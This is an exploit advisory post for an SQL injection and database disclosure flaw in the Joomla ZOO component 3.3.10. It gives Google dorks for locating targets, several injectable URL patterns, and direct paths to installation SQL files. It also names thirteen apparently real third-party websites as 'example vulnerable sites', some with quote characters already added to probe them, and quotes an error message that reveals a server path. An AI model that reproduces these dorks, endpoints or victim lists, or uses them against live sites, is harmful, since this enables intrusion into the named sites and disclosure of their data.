facebook facebook twitter rss

Joomla Zoo by YooTheme Components 3.3.10 SQL Injection / Database Disclosure

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : Joomla Zoo by YooTheme Components 3.3.10 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : yootheme.com
# Software Download Link : yootheme.com/zoo
# Software Information Link : extensions.joomla.org/extension/zoo/
# Software Version : 3.3.33 and 3.3.10
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:"/index.php?option=com_zoo"
inurl:''/administrator/components/com_zoo/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
ZOO component for Joomla 1.7 developed by YOOtheme .

ZOO is a flexible and powerful content application builder to manage your content.

####################################################################

# Impact :
***********
* An attacker might be able inject and/or alter existing

SQL statements which would influence the database exchange.

* SQL injection vulnerability in the Joomla Zoo by YooTheme Components 3.3.10 and other versions

because, it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read,

access or modify data, or exploit latent vulnerabilities in the underlying database.

If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_zoo&view=[SQL Injection]

/index.php?option=com_zoo&view=frontpage&Itemid=[SQL Injection]

/index.php?option=com_zoo&view=item&layout=item&Itemid=[SQL Injection]

/index.php?option=com_zoo&view=category&Itemid=[SQL Injection]

/index.php?option=com_zoo&task=category&category_id=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_zoo&view=category&layout=category&Itemid=[SQL Injection]

/index.php?Itemid=[ID-NUMBER]&option=com_zoo&view=item&category_id=[ID-NUMBER]&item_id=[SQL Injection]

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_zoo/installation/index.sql

/administrator/components/com_zoo/installation/install.sql

/administrator/components/com_zoo/installation/uninstall.sql

####################################################################

# Example Vulnerable Sites :
*************************

[+] conycap.com/cloud/administrator/components/com_zoo/installation/index.sql

[+] cabinete-stomatologice.biz/index.php?option=com_zoo&view=category&Itemid=3

[+] bestkitchenandappliances.com/index.php?Itemid=52&option=com_zoo&view=item&category_id=60&item_id=41

[+] socialmediasoluciones.com/index.php?option=com_zoo&task=category&category_id=25&Itemid=234

[+] bordervalley.co/index.php?option=com_zoo&view=item&layout=item&Itemid=262

[+] realstour.ru/index.php?option=com_zoo&view=category&Itemid=171

[+] animalwatcherspetresort.com/index.php?option=com_zoo&view=frontpage&Itemid=7%27

[+] mail.administratorsone.com/index.php?option=com_zoo&view=category&Itemid=226

[+] rt82.de/blog/index.php?option=com_zoo&view=item&layout=item&Itemid=110

[+] bestkitchenandappliances.com/index.php?option=com_zoo&view=category&layout=category&Itemid=58

[+] realstour.ru/index.php?option=com_zoo&task=item&item_id=91&Itemid=212

[+] virtual-managing.com/index.php?option=com_zoo&view=1%27

[+] locihouse.com/index.php?option=com_zoo&view=category&Itemid=4%27

####################################################################

# Example SQL Database Error :
*****************************

Strict Standards: Non-static method JLoader::import() should not be
called statically in /home/content/41/5733041/html/_sites
/locihouse.com/libraries/joomla/import.php on line 29

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :